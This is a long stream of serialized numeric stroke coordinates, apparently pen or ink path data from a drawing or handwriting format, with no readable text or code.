16,0 19-1,20-19-15,0 0 16,20-20 0,19 0-16,61 40 15,19-1 1,-60-19-16,160 40 16,39 39-16,39-20 15,41 60-15,-160-99 16,-39 0-16,-79-40 15,-41 0-15,-19-20 47,0-20-31,-39 0-16,-1-19 16,-39-60-16,-21 0 15,-58-40-15,19 20 16,-20-20-16,20 40 15,0-39-1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54.1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58 4391,'0'0,"18"0,0 0,1 0,17 0,18 0,1 0,54 0,18 0,36 0,-18 0,18 0,37 0,-37 0,37 0,-37 0,37 0,-19 0,-36 0,37 0,-55 0,-19 0,1 0,-54 0,-19 0,-18 0,0 0,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7:32.3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66 5358 0,'0'0'0,"0"158"0,59 41 15,1-40 1,-20-60-16,-20-40 16,-20 1-16,19-40 15,-19-1-15,0 1 16,0 0 125,0 0-126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02.8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7947,'0'-19,"55"19,-19 0,18 0,55 0,-18 0,54 0,36 0,-17 0,35 0,1 0,-1 0,1 0,-19 0,19 0,-55 0,-18 0,-36 0,-19 0,-17 0,-19 0,0 0,-17 0,-1 0,0 0,0 0,0 0,18 0,-17 0,-1 0,0 0,18 0,0 0,1 0,-19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03.4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94 7947,'0'0,"-18"0,0 0,0 0,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04.1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04 7947,'18'0,"0"0,18-19,1 19,17 0,-18 0,19 0,-1 0,19 0,17 0,-35 0,36 0,-19 0,1 0,54 0,-37 0,37 0,-36 0,36 0,-36 0,18 0,-19 0,1 0,18 0,0 0,-18 0,17 0,38 0,-38 0,-35 0,-19 0,1 0,-1 0,19 0,-1 0,19 0,-18 0,-1 0,-35 0,-1 0,0 0,0 0,1 0,-1 0,0 0,1 0,-19 0,0 0,0 0,0 0,0 0,0 0,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05.7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91 7910,'36'0,"-18"0,19 0,-1 0,0 0,19 0,-1 0,0 0,37 0,-36 0,17 0,-17 0,35 0,19 0,18 0,18 0,-36 0,36 0,0 0,-18 0,19 0,17 0,18 0,-36 0,-18 0,19 0,-38 0,38 0,-19 0,-19 0,-35 0,0 0,-37 0,0 0,-18 0,19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10.4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15 9217,'18'0,"36"0,19 0,54 0,0 0,18 0,18 0,37 0,-37 0,37 0,-19 0,1 0,-1 0,-36 0,0 0,-18 0,-36 0,0 0,-55 0,18 0,-35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11.7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068 8944,'18'0,"37"0,-1 0,19 0,145 0,-128 0,55 0,-36 0,-36 0,18 0,-1 0,1 0,0 0,-1 0,1 0,-36 0,-1 0,-18 0,-18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12.5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915 9053,'0'18,"36"-18,0 0,19 0,-1 0,37 0,-1 0,-17 0,18 0,-1 0,-17 0,0 0,35 0,-53 0,-37 0,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51:13.7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66 10178,'18'0,"19"0,-19 0,18 0,-18 0,37 0,-19 0,0 0,19 0,-1 0,1 0,-1 0,19 0,-1 0,19 0,-19 0,19 0,-36 0,-1 0,-36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7:19.6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26 6738 0,'52'0'78,"37"0"-78,87 0 16,-17 0-16,35 0 15,0 0-15,141 0 16,-123 0-16,123 35 16,-124-17-16,36 17 15,-53-35-15,-52 53 16,-37-53-16,-69 0 15,-19 0-15,1 0 1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57.0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506 5824,'0'0,"18"-18,0 18,0 0,19-18,-1-1,18 19,37 0,36 0,-18 0,36 0,36 0,-35 0,17 0,0 0,37 0,-73 0,-37 0,19 0,-36 0,-19 0,-36 0,1 0,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7:25.6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26 7938 0,'18'0'109,"0"0"-77,-1 0-1,1 0-15,17 0-1,53 0 1,36 0-16,17 0 15,71 0-15,-1 0 16,1 0-16,17 0 16,-35 0-16,-35 0 15,0 0-15,-36 0 16,18 0-16,-70 0 16,-53 0-16,17 0 140,-17 0-109,52 0-31,54 0 16,105 0-16,18 0 16,247 0-1,0 0-15,35 0 0,176 0 16,-123 0 0,-105 0-16,-248 0 15,0-36-15,-123 36 16,-88 0-16,-1 0 703,1 0-687,0 0-1,-1 0 1,1 0-16,123 0 15,159 0-15,123 0 16,-88 0-16,195 0 16,-142 0-16,0 0 15,-89 0-15,-122 0 16,-36 0-16,-106 0 16,-52 36 405,-19-36-405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7:44.7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59 11201 0,'71'0'140,"-18"0"-124,35 0-16,106 0 16,0 0-16,0 0 15,0 0-15,0 0 16,-18 0-16,1 0 16,-71 0-16,-18 0 15,-71 0-15,1 0 63,35 0-48,-18 0-15,18 0 16,0 0-16,0 0 16,-18 0-16,1-36 15,-19 36 16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5:36.6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919 9009 0,'20'0'78,"39"0"-62,21 0-1,-1 0-15,20 0 16,20 0-16,0 0 16,20 0-16,20 0 15,-20 0-15,20 0 16,-20 0-16,19 0 15,-58 0-15,-1 0 16,-20-20-16,1 20 16,-21 0-16,-19 0 15,19 0-15,-19 0 16,19 0-16,-39 0 16,20 0-1,-20 0-15,0 0 16,19 0-16,1 0 0,0 0 31,-20 0-31,19 0 16,-19 0-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5:43.0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982 13811 0,'20'0'62,"0"0"-62,0 0 16,39 0-16,1 0 15,39 0-15,60 0 16,59 0-16,-20 0 16,-19 0-16,19 0 15,-118 0-15,78 0 16,-19 0-16,-20 0 15,-19 0-15,-1 0 16,-20 0-16,-19 0 16,-21 0-16,-19 0 15,0 0-15,0 0 16,0 0 0,0 0-1,0 0 16,-1 0-15,1 0 125,20 0-110,-40-40-31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5:57.9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998 13652 0,'40'0'125,"59"0"-125,60 0 16,-20 20-16,59 20 15,-59-1-15,-20 1 16,-20-40-16,-19 20 16,-21-20-16,1 0 15,-20 0-15,-1 0 16,-19 0-16,0 0 15,0 0 1,20 0-16,-21 0 16,1 0-16,0 0 15,0 0-15,20 0 16,-1 0-16,1 20 16,-40 0-16,20-20 93,0 0-61,-1 0-17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45:59.2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094 13771 0,'20'0'16,"19"0"0,21-20-1,19 20-15,40 0 16,40 0-16,20 0 16,19-19-16,-39 19 15,0 0-15,-40 0 16,20-20-16,-20 20 15,-20-20-15,-40 0 16,1 20-16,-20 0 16,-1 0-16,-19 0 15,0 0-15,0 0 16,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-16,0 0 16,20-40-1,-21 40 1,21-19 0,-40-1-16,20 20 15,-20-20-15,0 0 31,0-20-31,0-19 16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5:47.2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971 11033 0,'0'0'0,"-60"59"16,1-19-16,-41 20 16,-19 19-16,0 0 15,0-39-15,0 39 16,20-19-16,20-1 16,-21-39-1,80 20-15,-59-20 0,39 39 16,-19-39-16,-1 20 15,21-20 1,-1 19-16,0-19 16,-19 0-16,19 20 15,0-20-15,20 0 16,-39-1-16,39-19 16,20 20-16,-40-20 15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5:48.5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911 11172 0,'20'0'32,"-20"20"-32,20-20 15,-20 19-15,20 41 16,-1 0-16,1 19 15,40 40-15,-20 20 16,-1 0-16,1 0 16,19-20-1,-19 0-15,0 0 16,-40-40-16,40-19 16,-21 39-16,1-59 15,-20-1-15,20-19 16,-20 0-1,20-20-15,-20 20 32,0 0-32,20-20 15,0 0 79,-20-20-78,19 0-1,-19 0 1,20-19 15,-20 19-31,20 0 16,-20-20-1,20 0-15,20 21 16,-21-21-16,21 0 16,0 1-16,0-21 15,59 20-15,-40-19 16,100-21-16,-80 1 16,21 0-16,-21 39 15,-39 0-15,-20 20 16,-1 20-16,-19-19 15,20-21-15,20 20 16,-40 0-16,20 0 16,0 1-16,19-1 15,21-20-15,-20 20 16,-1-39-16,41 19 16,-61-20-16,41-19 15,-1 20-15,-39-1 16,0 20-16,0 20 15,-20 1 1,20 19 78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12.8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908 10914 0,'-20'20'16,"0"0"-16,0-1 16,-20 21-16,20 20 15,-39-21-15,-1 41 16,-39 19-16,20-40 16,-20 1-16,39-20 15,-59 19-15,79-19 16,-59-1-16,79-39 15,-19 40-15,19-40 16,20 20 15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13.3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650 11450 0,'39'0'47,"21"0"-31,59 0-16,-20 0 15,60 0-15,-20 19 16,0-19-16,-60 0 16,-59 0-16,0 0 1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3:58.9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94 7021,'18'0,"0"0,1 0,-1 0,36 0,1 18,53-18,-17 0,36 0,18 0,0 0,19 0,17 0,-18 0,55 0,-18 19,54-19,-18 0,18 0,0 0,72 0,73 0,-127 0,55 0,-37 0,-18 0,-36 0,36 0,-18 0,-36 0,0 0,36 0,-36 0,36 0,-37 0,-35 0,17 0,-35 0,-1 0,18 0,-17 0,-1 0,18 0,-36 0,1 18,17 0,-18-18,-18 0,18 0,0 0,0 0,-36 0,-18 18,36-18,0 0,-36 18,36-18,18 18,-18-18,0 18,-36-18,17 0,19 19,19-1,-56-18,37 18,18-18,-18 18,-36-18,72 18,-17-18,-1 18,-36-18,18 18,18-18,-18 0,0 0,0 0,-18 0,-1 0,-17 0,-18 0,17 0,-17 0,0-18,-19 18,-18 0,-18 0,19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6:14.1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868 11469 0,'0'20'15,"0"0"1,0 40-16,0-1 15,0 1-15,0-1 16,0 1-16,0-40 16,0 79-16,0-20 15,0 20 1,0 21-16,0 18 16,-20 21-16,-20 20 15,-19-1-15,-1 21 16,1-60-16,19-20 15,20-60-15,0-19 16,20-20-16,0 0 16,0 0-16,-20-1 15,1-19 79,19-19-78,-20-1-16,20 0 15,-20 0-15,20 0 16,-20 0-16,0 0 16,0-19-16,1-1 15,-41-19-15,20-21 16,1 1-16,19 39 15,0 20 1,20 0-16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4:24.9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76 13282 0,'0'-18'62,"0"1"1,17 17-63,36 0 15,0 0-15,18 0 16,34 0-16,-34 0 16,0 0-16,17 0 15,18 0-15,-36 0 16,1 0-16,-1-18 15,-34 18-15,16-17 16,1 17-16,0-18 16,0 18-16,0 0 15,-35 0-15,-1 0 16,1 0-16,0 0 16,17 0-16,18 0 15,17 0-15,36 0 16,0 0-16,18 0 15,17 0-15,-18 0 16,-17 0-16,17 0 16,-17 0-16,0 0 15,18 0 1,-36 0-16,18 0 16,17 0-16,-52 0 15,34 0-15,1 0 16,-18 0-16,54 0 15,-1 0-15,53 0 16,-53 0-16,18 0 16,17 0-16,-70 0 15,17 0-15,-17 0 16,-18 0-16,-17 0 16,-1 0-16,19 0 15,-36 0-15,17-18 16,1 1-16,-1 17 15,1 0-15,17 0 32,-53 0-32,-17 0 0,-1 0 15,1-18 63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4:00.0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16 4533 0,'36'-17'31,"16"17"-15,37-18-16,16 0 15,37 1-15,563-1 32,-511 18-17,-17 0 1,-1 0-16,-70 0 0,0 0 15,-53 0-15,-18 0 16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4:13.7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5891 0,'18'0'47,"70"0"-47,-18 18 16,36 0-16,35 17 16,0 0-16,1-17 15,34-1-15,-53 1 16,19 0-16,-1-1 15,0 1-15,-18 0 16,-17-1-16,-53 1 16,-18-18-16,-17 0 15,0 0 32,-1 0-16,1 0-15,-1 0-16,1 0 31,0 0 16,-1 0-47,19 0 16,17 0-16,-36 0 15,18 0-15,-17 0 16,0 0-16,-1 18 78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4:23.4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75 16369 0,'0'0'0,"88"35"15,54-17-15,-19-1 16,1 1-16,17 0 16,-18-1-16,-17-17 15,17 0 1,-52 0-16,35 0 15,-36 0-15,1 0 16,-36 0-16,0 0 16,1 0-16,-19-17 15,1-1 1,0 18-16,-1-18 16,54 18-1,-1-35-15,-34 35 16,17 0-16,0 0 15,-1 0-15,37 0 16,69 0-16,-52 0 16,18 0-16,-1 0 15,1 18-15,-36-18 16,18 17-16,-53-17 16,0 0-16,-36 0 15,1 0-15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4:25.4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78 16387 0,'18'0'31,"0"0"-31,17-18 15,-17 18-15,17 0 16,35 0-16,36 0 16,0 0-16,53 0 15,17 0-15,36 0 16,-18 0-16,18 0 16,229 0-1,-212 0-15,-17 0 16,35 0-16,-36 0 15,1 0-15,-18 0 16,18 0-16,-54 0 16,36 18-16,-35-1 15,35 1 1,-17 17-16,34-35 16,-34 0-16,-1 0 0,-17 0 15,-18 0 1,0 0-16,0 0 0,18 0 15,-18 0 1,0 0-16,35 0 16,-34 35-16,16-35 15,-34 0-15,-18 0 16,-18 18-16,-18-18 16,36 18-16,-18-1 15,18-17-15,18 0 16,-54 18-16,54-18 15,-1 35-15,1-17 16,-19-1-16,19 1 16,-1 0-16,-17-18 15,0 0-15,0 0 16,17 0-16,19 0 16,-1 0-16,17 0 15,1 0-15,-18 0 16,-17 0-16,17-18 15,0 18-15,35 0 16,-35 0-16,1 0 16,298 0-1,-316 0 1,17 0 0,0 0-16,-53 0 15,-52 0-15,-1 0 16,-17-18-1,-1 18 17,-17-17-17,18-18 1,0-1 0,-1 19-16,1-1 15,-18 0 1,17 18-1,-17-17 1,0-1 15,18 18-31,-18-18 16,18 18 0,-1 0-1,1-17-15,-18-1 47,35 18-31,-17 0 15,0 0-15,-1 0 3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06.8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79 4322 0,'18'0'31,"17"0"-15,18 0-16,0 0 16,53 0-16,35 0 15,-18 0-15,-17 0 16,18 0-16,-54 0 15,-34 0-15,-1-18 16,0 0 0,-17 18-1,17 0-15,-17-17 16,35 17-16,-36 0 31,1 0 79,0 0-79,-1 0-31,1 0 31,-18-18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09.3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165 4392 0,'53'0'141,"124"0"-126,-1 0-15,36 0 16,17 0-16,71 0 16,-18 0-16,18 0 15,-53 0-15,18 0 16,-36 0-16,-53 0 16,18 0-16,-35 0 15,35-18-15,-18 18 16,-17 0-16,-18-17 15,18 17-15,17-18 16,107-35 0,-177 53-1,-18-17-15,-35-1 0,0 18 16,-1-18-16,-16 18 16,-1-17-16,18 17 15,0 0-15,0 0 16,0-18-16,17 18 15,107 0 1,-4181 0 0,8166 0-16,-4091 0 0,-1 0 15,-17 0 1,18 0-16,17 0 16,-17 0-16,-1 0 15,18 0-15,18 0 16,-18 0-16,18 18 15,-18-1-15,1 1 16,-19-18-16,-17 0 16,18 0-16,-18 18 15,0-18-15,17 17 16,18 1-16,-17 0 16,-1-18-16,54 17 15,-18 1-15,-18-18 16,35 0-16,-17 17 15,-18 1-15,1 0 16,-1-18-16,-18 17 16,-17 1-16,53 0 15,-53-18 1,18 17-16,-1-17 0,1 0 16,17 0-16,-35 18 15,17-18 1,-17 0-16,18 0 0,-18 0 15,0 0-15,17 0 16,18 0 0,18 0-16,0 0 15,18 0-15,-1 0 16,18 0-16,-17 0 16,158 0-1,-141 0-15,35 0 16,1 0-16,-19 0 15,1 0-15,-18 0 16,36 0-16,-36 0 16,35 0-16,-35 0 15,0 0-15,36 0 16,-71 0-16,0 0 16,35 0-1,-71 0-15,-17 18 16,-18-18-16,18 0 15,-35 0 1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12.6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44 6015 0,'17'0'234,"19"0"-234,34 0 16,1 0-16,17 0 15,0 0-15,-17 0 16,34 0-16,-34 0 16,0 0-16,-1 0 15,-35 0-15,-17 0 16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14.1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042 5997 0,'0'18'31,"18"-18"0,17 17-15,-18-17-1,19 0 1,-19 0 0,36 0-16,0 0 15,0 0-15,0 0 16,18 0-16,-1 0 15,36 0-15,18 0 16,34 0 0,-17 0-16,36 0 0,34 0 15,1 0-15,17 0 16,-17 0 0,0 36-16,17-36 15,-17 17-15,-1 1 16,-17 0-16,0 17 15,0-17-15,-35-1 16,-18 1-16,0 0 16,-35-1-16,-35 1 15,-18-18-15,-18 0 16,0 0-16,-17 0 47,0 17-32,17-17-15,0 0 16,18 0-16,-18 0 16,36 0-16,17 0 15,-17 0-15,17 0 16,35 0-16,1 0 16,17 18-16,0 0 15,0-1-15,0 1 16,0 0-16,0-18 15,1 0 1,-1 0-16,-36 0 0,-34 0 16,-36 0-16,-17 0 15,0 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18.4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417 7094,'18'0,"37"0,-19 0,19 0,-1 0,0 0,-17 0,17 0,-18 0,1 0,-19 0,0 0,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16.0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355 6191 0,'0'0'0,"18"0"15,0 18-15,-1-18 16,1 0-16,35 18 16,0-1-16,-18-17 15,18 18-15,53-18 16,0 0-16,17 0 15,0 0-15,36 0 16,0 0-16,35 0 16,18 0-1,-1 0-15,19 0 0,-1 0 16,36 0 0,-36 35-16,0-17 15,18-18-15,-18 17 16,353-17-1,-423 0 1,-35 0-16,-1 0 16,-70 0-16,-18 0 15,-17 0-15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18.1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87 7373 0,'35'0'47,"1"0"-32,34-18-15,1 1 16,52-1-16,1 0 16,17 1-16,0-1 15,35 1-15,36-19 16,-18 19-16,53 17 16,17 0-16,19 0 15,-54 0-15,36 0 16,-54 0-16,-17 0 15,-17 0-15,-19 0 16,125 0 0,-125 0-1,-17 0-15,36 0 0,-18 0 16,35 0-16,17 0 16,19 0-16,-1 0 15,35 0-15,-34 0 16,17 0-16,0 0 15,35 0-15,-35 0 16,264-36 0,-211 1-1,-35 35-15,-18 0 0,53 0 16,-71 0 0,18 0-16,0 0 15,-18 0-15,0 0 16,-35 0-16,18 0 15,-53 0-15,-18 0 16,-53 0-16,18 0 16,-71 0-16,1 0 15,-19 0 1,18 0-16,1 0 0,-1 18 16,18-18-16,53 35 15,-53-35-15,35 18 16,35-1-16,1 1 15,-18-18-15,17 18 16,-17-18-16,-18 0 16,18 0-16,-18 0 15,18 17-15,-18-17 16,-17 0-16,35 0 16,-18 0-16,0 0 15,53 0 1,-88 0-1,-18 0-15,-17 0 0,17 0 16,0 0 0,1 0-16,-1 0 15,0 0-15,-17 0 16,0 0-16,-1 0 16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20.0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262 5944 0,'70'0'63,"1"0"-63,17 0 15,35 0-15,36 0 16,18 0 0,-1 0-16,18 0 0,18 0 15,17 0 1,-17 53-16,-1-35 16,-17 17-16,-17-17 15,-19-1-15,-16 19 16,-37-36-16,-52 17 15,-17 1-15,-19-18 32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31.2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307 10548 0,'17'0'16,"1"0"-16,35 0 16,0 0-16,70 0 15,18 0-15,53 0 16,-17 0-16,-1 0 15,0 0-15,-34 0 16,-19 0-16,0 0 16,19 0-1,-89 0-15,17 0 16,1 0-16,34 0 16,-16 0-16,52 0 15,0 0-15,18 0 16,52 0-1,1-35-15,53-18 16,52 35-16,1-52 16,34 52-16,54-35 15,-53 35-15,0-17 16,-106 35-16,17 0 16,-52 0-16,-1 0 15,-34 0-15,-1 0 16,-70 0-16,53 0 15,-53 18-15,17-1 16,-17 1-16,-18-18 16,0 0-16,-35 0 15,0 0-15,-18 0 16,-17 0 62,17 0-78,1 0 16,-19 0 31,1 0-32,0 0 1,-1 0-16,1 0 15,-1 0 1,1 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,-1 0-15,36 0 31,-35 0-15,-1 0-16,1 0 16,0 0-16,-1 0 15,1 0 1,0 0 0,-1 0 15,1 18 31,0-18-15,-18 17 16,0 1-48,0 0 1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0:33.7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403 10460 0,'0'-18'0,"17"18"16,19 0 0,17 0-1,0 0-15,105 0 16,19 0-16,52 0 16,36 0-16,52 0 15,71 0-15,-106 0 16,71 0-16,-124 0 15,-52 0-15,-1 0 16,-88 0-16,-17 0 16,-36 0-16,-17 0 15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21:05.2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9 10041 0,'20'0'47,"40"0"-31,19 20-1,100-20-15,-1 0 16,60 0-16,20 0 16,20 0-16,0 0 15,-20 0-15,-20 0 16,-39 0-16,39 0 15,-20 0-15,0 0 16,-19 0-16,19 0 16,0 0-16,-138 0 15,178 19-15,0 1 16,-40 0-16,-40 0 16,21-20-16,-21 40 15,21 19-15,-1 1 16,-39 19-16,0-59 15,0-20-15,39 0 16,-19 0-16,-21 0 16,-58 0-16,19 0 15,-40 0 1,-19 0-16,-41 0 0,61 0 16,-1 0-1,-39 0-15,19 0 16,-39 0-16,20 0 15,-20 0 1,0 0-16,19 0 16,41 0-16,-21 20 15,-19 0-15,0-20 16,-1 19-16,-19 1 16,0-20-1,20 0 16,-21 0 1,1 0-32,0 0 15,0 0-15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4:37.3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05 13553 0,'20'0'62,"0"0"-46,0 0-16,-1 0 16,1 0-16,0 0 15,40 0 1,-1 0-16,40-20 0,-19-19 16,39-1-1,0 0-15,0 0 0,-20 1 16,-59 39-1,39 0-15,-19 0 16,-21 0-16,1 0 16,0 0-16,-20 0 15,19 0-15,-19 0 16,20 0-16,0 0 16,-1 0-16,21 0 15,-1 0-15,1 0 16,19 0-16,-19 0 15,-1 0-15,-19 0 16,0 0-16,19 0 16,1 0-16,-21 0 15,41 0-15,-41 0 16,21 0-16,-20 0 16,-1 0-16,-19 0 15,40 0-15,-21 0 16,-19 0-1,20 0-15,0 0 16,19 0-16,21 0 16,-21 0-16,20 0 15,-19 0-15,-20 0 16,-1 0-16,1 0 16,-20 0-1,0 0-15,19 0 16,-19 0-16,0 0 15,40 0-15,-1 0 16,21 0-16,-1 0 16,-20 20-16,61 19 15,-81-39-15,21 0 16,-21 0-16,-19 0 16,20 0-16,-20 0 15,0 0 1,-1 0-1,1 0 1,0 0-16,0 0 16,20 0-16,-1 0 15,1 0-15,0 0 16,-1 0-16,1 0 16,0 20-1,-1 0 1,-19-20-16,0 0 15,20 0-15,-20 0 16,0 0-16,-1 0 16,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0-1,1 0-15,0 0 16,0 0 15,0 0-15,0 0 0,0 0-16,-1 0 15,1 0-15,0 0 16,0 0-16,0 0 15,0 0 48,-1 0-32,1 0 110,-20 20-126,-59-20 220,-21 0-235,61 0 15,-61 0-15,-39 0 16,20 0-16,-40 0 16,60 0-16,-40 0 15,19 0-15,1 0 16,0 0-16,-20 0 16,0 0-16,-40 0 15,-20 0-15,21 0 16,-21 0-16,20 0 15,1 0-15,58 0 16,-58 0-16,39 0 16,-1 0-16,21 0 15,-20 0-15,60 0 16,-41 0-16,21 0 16,-20 0-16,19 0 15,-58 0-15,58 0 16,1 0-16,-1 0 15,21 0-15,-1 0 16,21 0-16,19 0 16,0 0-16,20 20 15,-20-20 48,0 0-16,20 20-47,0-1 15,0 1-15,0 0 16,0 0 0,-20-20-16,20 20 15,-19-20 1,19 20-16,0-1 15,19-19 173,21 0-188,40 20 16,58 0-16,-18-20 15,18 0-15,21 0 16,0 0-16,-20 0 15,-20 0-15,0 0 16,-20 0-16,-19 0 16,19 0-16,-20 20 15,20-20-15,1 20 16,-81-20-16,61 0 16,-21 0-16,1 0 15,-1 0-15,-19 0 16,0 0-16,19 0 15,1 0-15,19 0 16,-19 0-16,-1 0 16,1 0-16,-1 0 15,1 0-15,-20 0 16,-1 0-16,1 0 16,-20 0-16,0 0 15,-1 0-15,21 0 16,-20 0-16,0 20 15,20-20 1,-2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6:36.4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489 12029,'18'0,"0"0,18 0,19 0,-1 0,19 0,36 0,-19 18,56-18,-19 0,0 0,-19 0,1 0,-18 0,18 0,-55 0,19 0,-1 0,1 0,0 0,-1 18,1-18,36 0,18 0,-37 0,1 0,36 0,0 0,18 0,-54 0,54 0,-18 0,0 0,18 0,0 0,0 0,-18 0,-18 0,18 0,18 18,-36-18,0 0,0 18,-18-18,-1 0,1 0,-36 0,35 0,19 0,-36 0,-1 0,1 0,36 0,-19 0,37 0,0 0,-18 0,18 0,-36 0,18 0,-18 0,17 18,19-18,-36 0,36 0,-36 0,-19 0,-17 19,36-19,-19 0,19 0,18 0,-37 0,1 0,-19 0,-17 0,35 0,-17 18,17-18,-36 0,37 0,-37 0,19 0,-1 0,-18 0,19 0,17 18,-35-18,17 0,1 0,17 0,-17 0,-1 0,-36 0,18 0,1 0,-1 0,0 0,1 0,-1 0,0 0,-18 0,19 0,-1 0,0 0,0 0,1 0,17 0,1 0,-1 0,0 0,1 0,-1 0,-36 0,55 0,-19 0,1 0,-1 0,1 0,35 0,1 0,-18 0,-19 0,1 0,-1 0,-18 0,1 0,-1 0,0 0,0 0,-17 0,17 0,18 0,-17 0,17 0,19 0,-1 0,-36 0,19 0,-1 0,1 0,17 0,-35 0,35 0,-36 0,19 0,17-18,37 18,18 0,-18 0,18 0,0 0,-18 0,18 0,0 0,-36 0,-19 0,37 0,-36 0,-1 0,-17-18,-1 18,-18 0,-17 0,-1 0,0 0,0 0,0 0,18 0,73-19,-36 1,-1 0,-17 18,-1 0,-17 0,-19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6:37.8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12 13535,'0'0,"-36"0,54 0,0-19,36 19,-36 0,19 0,17 0,55 0,36 0,37 0,17 0,19 0,90-36,-90 36,0-18,36 18,18 0,-36 0,-37-18,37 18,-36 0,-37 0,18 0,-72 0,36 18,1-18,-110 0,73 0,-91 0,73 0,-1 0,-17 18,-1-18,-35 0,-1 0,0 0,19 0,-19 0,-18 0,18 0,-17 0,35 0,-36 0,18 18,-17-18,17 0,-18 0,0 0,0 0,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6:42.4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258 13408,'55'-19,"-1"1,55 18,-18 0,54 0,0 0,0 0,0 0,109 0,-18-18,18 0,-72 0,53 18,38 0,-92 0,37 0,18 0,-19 0,37 0,-72 18,17-18,-17 18,-37-18,18 0,-18 36,37-17,-37-1,36 0,-17-18,17 18,19 18,-1-18,-36-18,1 0,-1 19,-18-19,0 0,-54 0,0 0,-1 0,-35 0,-19 0,-18 0,0 0,19 0,-19-19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19.1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758 7130,'36'-18,"0"18,55 0,18 0,0 0,36 0,54 0,37 0,-54 0,-19 0,37 0,-19 0,19 0,17 0,-53 0,17 0,-18 0,1 0,-37 0,-37 0,-17 0,-19 0,-17 18,-19-18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6:43.5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7 14623,'36'0,"19"18,54-18,36 0,36 0,-17 0,53 0,1 0,0 0,-55 0,0 0,-18 0,-54 0,-55 0,-17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8:18.7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09 5856 0,'17'0'125,"19"18"-110,34-1 1,-35-17-16,1 18 16,34 17-16,-17 1 15,-35-36 1,35 17-16,-18-17 16,0 18-16,-17-18 15,0 0-15,52 0 16,-17 17-16,18-17 15,34 18-15,1-18 16,-35 0-16,70 0 16,-35 0-16,17 0 15,-17 0 1,-53 0-16,-18 0 16,-17 0-16,17 0 15,-17 0-15,-1 0 16,1 0 156,0 0-141,17 0-31,-17 18 16,-1-18-16,1 0 15,35 0 1,-36 0 31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8:35.6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602 16245 0,'36'0'203,"193"0"-187,124 0-16,52-35 16,1 0-16,-106 35 15,35-35 1,-88 35-16,0 0 15,-71 0-15,-34 0 16,-72 0-16,-17 0 16,0 0-16,-18-18 15,-17 18 1,-1-18-16,19 18 16,34-17-16,-17 17 15,35 0-15,36-36 16,-1 19-16,1 17 15,-18 0-15,-1 0 16,-69 0-16,34 0 16,-17 0-16,0 0 15,0 0-15,-18 0 16,1-18-16,-19 18 16,1 0-16,35 0 15,0 0-15,17 0 16,1 0-16,35 0 15,-18 0-15,71 0 16,-18 0-16,-18 0 16,-70 0-16,18 0 15,17 0-15,-35 0 16,17 0 0,19 0-16,16 0 15,72 0-15,-1 0 16,1 0-16,34 0 15,-17 0-15,-35 0 16,17 0-16,-87 0 16,-37 0-16,-34 0 15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6:58.1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11 7549 0,'0'-17'15,"17"17"48,1-18-32,0 18-31,17 0 16,18 0-16,17 0 15,19-17-15,-1 17 16,-18 0-16,36 0 16,-18 0-16,18-18 15,0 18-15,17-35 16,-17 17-16,35 0 16,-17 1-1,17-1-15,-18 18 16,1 0-16,17 0 0,-35 0 15,35 0 1,0 0-16,0 0 16,-17 0-16,17 0 15,-35 0-15,-1 0 16,19 0-16,-1 0 16,1 0-16,35 0 15,-1 0-15,195 0 31,-159 0-31,18 0 0,-53 0 16,52 0-16,-52 0 16,35 0-16,-35 0 15,-18 0-15,35 0 16,-35 0-16,1 0 16,16 0-16,72 0 31,-125 0-31,-34 0 0,-36 0 15,1 0-15,-19 0 16,1 0 0,-1 0 46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6:59.7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10 8802 0,'36'0'16,"34"0"-16,18 0 16,36 0-16,17 0 15,35 0-15,-17 0 16,0 0-16,0 35 15,-54-35-15,1 18 16,-18-1-16,-35-17 16,0 0-16,-35 0 15,17 0-15,-17 0 16,-1 0 0,19 0 15,-19 0-16,1 0 1,17 0-16,18 0 16,0 0-16,35 0 15,18 0-15,0 0 16,17 0-16,1 0 16,-54 0-16,1 0 15,0 0-15,-36 0 16,0 0-16,-17 0 15,-1 0 126,1 0-125,0 0 46,17 0 48,-17 18-64,-18 0-14,35-18-1,-17 0-15,17 17-1,-18-17-15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7:01.1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75 15399 0,'0'0'0,"0"-18"0,18 0 31,17 18 0,0 0-31,53 0 16,1 0-16,34 0 16,18 0-16,0 0 15,18 0-15,35 0 16,-53 0-16,18 0 15,-53 0-15,88-35 32,-106 35-32,35 0 0,19 0 15,16 0-15,19 0 16,-36 0 0,-18 0-16,-70 0 0,-35 0 15,-18 18 1,17-18 31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7:09.6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14 8855 0,'0'-18'47,"35"18"-32,0 0-15,18 0 16,36 0-16,52 0 15,70 0-15,19 35 16,-19 18 0,-70-53-16,-35 0 0,-35 0 31,-54 0 0,1 0 32,0 18-48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7:11.7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88 8802 0,'0'0'0,"70"0"0,36 17 15,-35-17-15,35 0 16,-18 18-16,18 0 16,-36-18-16,36 0 15,0 0-15,0 17 16,17-17-16,-17 0 15,35 0-15,0 0 16,53 18-16,-53 17 16,36-17-16,-36 0 15,0-18-15,-17 0 16,-1 17-16,-35-17 16,-17 0-16,-1 0 15,1 0-15,-18 0 16,0 0-16,-36 0 15,1 0 1,0 0 15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7:19.1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901 9807 0,'0'-17'62,"17"17"-62,36 0 16,18 0-16,17 0 16,53 0-16,18 35 15,0-18-15,0-17 16,35 18-16,-36-18 16,36 53-16,0-35 15,-53-1-15,53 19 16,-52-36-16,16 0 15,19 0-15,-71 0 16,35 0 0,-18 0-16,-17 0 0,-18 0 15,36 0-15,-36 0 16,35 0-16,1 0 16,-18 0-16,35 0 15,-18 0-15,1 0 16,17 0-1,53 0 1,-106 0-16,18-18 16,-36 0-16,36 18 15,-18 0 1,18 0-16,-18 0 0,1 0 16,-19 0-16,36 18 15,-18 0-15,0-1 16,-17-17-16,0 18 15,-19 0-15,-16-18 16,-1 35 0,-17-35-16,-1 0 172,19 0-157,-19 0 1,18 0-16,-17 0 15,17 0-15,18 0 16,-17 0-16,-1 0 16,-17 0-16,-1 0 15,18 0-15,18 0 16,-17 0-16,17 0 16,17 0-16,1 0 15,-1-18-15,1 18 16,-1-17-16,-52 17 15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8:54.6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34 6050 0,'1658'-247'0,"-1640"247"78,17 0-78,0 0 16,0 0-16,1 0 16,-1 0-16,0 0 15,1 0-15,16 0 16,1 0-16,18 0 16,17 0-16,0 0 15,36 0-15,-18 0 16,-36-17-16,-52-1 15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20.4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0 8636,'0'0,"37"0,-19 0,0 0,0 0,0 0,0 0,19 0,17 0,73 0,0 0,0 0,36 0,37 0,18 0,-55 0,-18 0,0 0,-18 0,-18 0,-36 0,-19 0,-36 0,-36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07.3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43 6244 